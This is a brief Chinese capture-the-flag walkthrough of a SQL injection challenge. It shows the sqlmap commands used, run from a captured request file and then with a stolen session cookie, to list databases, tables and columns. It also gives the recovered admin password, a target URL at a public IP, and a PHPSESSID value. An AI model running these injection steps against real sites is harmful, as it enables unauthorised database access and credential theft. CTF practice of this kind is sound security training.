1,首先看下这个网站
2,用抓包工具进行抓包
3,保存到txt文本文档为1.txt;
4,sqlmap开始注入;
python2 sqlmap.py -r "C:\Users\95112\Desktop\1.txt" -p username --dbs
获取表
python2 sqlmap.py -r "C:\Users\95112\Desktop\1.txt" -p username -D " sqli_database" --tables
python2 sqlmap.py -r "C:\Users\95112\Desktop\1.txt" -p username -D " sqli_database" -T "user" --columns
最终得到账号是admin密码u4g009
登录成功,得到url
http://118.190.152.202:8011/?id=1
截取cookie
PHPSESSID=gvfqspfsid48p2lf8e6iv0s9d0
继续sql注入
python2 sqlmap.py -u "http://118.190.152.202:8011/?id=1" --cookie="PHPSESSID=gvfqspfsid48p2lf8e6iv0s9d0" --dbs
最终得到flag
